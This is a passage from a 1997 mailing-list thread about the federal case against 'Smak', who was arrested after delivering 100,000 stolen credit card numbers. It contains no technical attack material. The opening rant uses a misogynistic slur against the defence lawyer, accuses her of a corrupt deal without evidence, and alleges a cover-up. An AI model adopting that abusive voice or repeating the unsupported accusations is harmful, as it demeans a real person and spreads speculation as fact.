the victims have been identified only to the defense, as part of the criminal discovery in the case. Silly me, I thought the people who had their credit card information exposed were the victims. 5. The difficulties facing these victims include the probability that additional hackers will seek to challenge these computer systems, once the defendant's successful efforts are revealed; and the loss of business due to the perception by others ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ that computer systems may be vulnerable. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Uh... Excuse me, Dude, but I believe that's how life works. Unless, of course, the government steps in to cover up the facts to the benefit of rich corporations and to the detriment of their gullible customers. 8. The defendant's counsel was contacted regarding this motion. She expressed a willingness to agree to it, but only if the government agreed to limit in some way the government's appropriate public release of the defendant's guilty pleas as a deterrent to others. Such an arrangement was not acceptable to the government. Defendant's counsel therefore indicated that she would like to file an opposition to this motion; but would agree that pending the resolution of this issue, that the identities of the victims could be protected. The cunt sold her client down the river for a good tee time with the prosecutor at a private golf course. Put her in charge of defending Terry McNicols. "Smak" delivered an encrypted CD containing over 100,000 stolen credit card numbers. After the validity of the credit card information was confirmed through decryption of the data on the CD, "Smak" was taken into custody by the FBI. And the 100,000 people were immediately notified that their credit cards had been compromised? I fucking doubt it. Better to screw over 100,000 citizen-units than expose the incompetence of a few companies and the government's fight against strong encryption and computer security. ShitMonger From wombat at mcfeely.bsfs.org Sun Aug 31 19:46:39 1997 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Mon, 1 Sep 1997 10:46:39 +0800 Subject: "Smack" the lawyer of your choice...but smack! In-Reply-To: <199709010106.DAA22158@basement.replay.com> Message-ID: On Mon, 1 Sep 1997, Anonymous wrote: > "Smak" delivered an encrypted CD containing over 100,000 stolen > credit card numbers. After the validity of the credit card information > was confirmed through decryption of the data on the CD, "Smak" was > taken into custody by the FBI. > > And the 100,000 people were immediately notified that their credit > cards had been compromised? I fucking doubt it. Better to screw over > 100,000 citizen-units than expose the incompetence of a few companies > and the government's fight against strong encryption and computer > security. I was recently notified by a bank that issued one of my credit cards that my card number had been sold, along with thousands of other account numbers, to an undercover FBI agent. The bank canceled my account, opened a new one, and overnighted a replacement card. No big deal, and no loss to me. OTOH, it *might* have been in response to a different incident. Keep those paranoid rants coming. -r.w. From bd1011 at hotmail.com Sun Aug 31 20:06:09 1997 From: bd1011 at hotmail.com (nobuki nakatuji) Date: Mon, 1 Sep 1997 11:06:09 +0800 Subject: No Subject Message-ID: <19970901025202.18246.qmail@hotmail.com> ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com From ualdv8 at sk.sympatico.ca Sun Aug 31 21:18:07 1997 From: ualdv8 at sk.sympatico.ca (Deuce) Date: Mon, 1 Sep 1997 12:18:07 +0800 Subject: "Smack" the lawyer of your choice...but smack! In-Reply-To: Message-ID: <340A3EE8.45A6@sk.sympatico.ca> Rabid Wombat wrote: > > On Mon, 1 Sep 1997, Anonymous wrote: > > > "Smak" delivered an encrypted CD containing over 100,000 stolen > > credit card numbers. After the validity of the credit card information > > was confirmed through decryption of the data on the CD, "Smak" was > > taken into custody by the FBI. > > I was recently notified by a bank that issued one of my credit cards that > my card number had been sold, along with thousands of other account > numbers, to an undercover FBI agent. The bank canceled my account, opened > a new one, and overnighted a replacement card. No big deal, and no loss > to me. When were you notified? Is there a place a person can check to see if their credit card was one of the ones sold? Deuce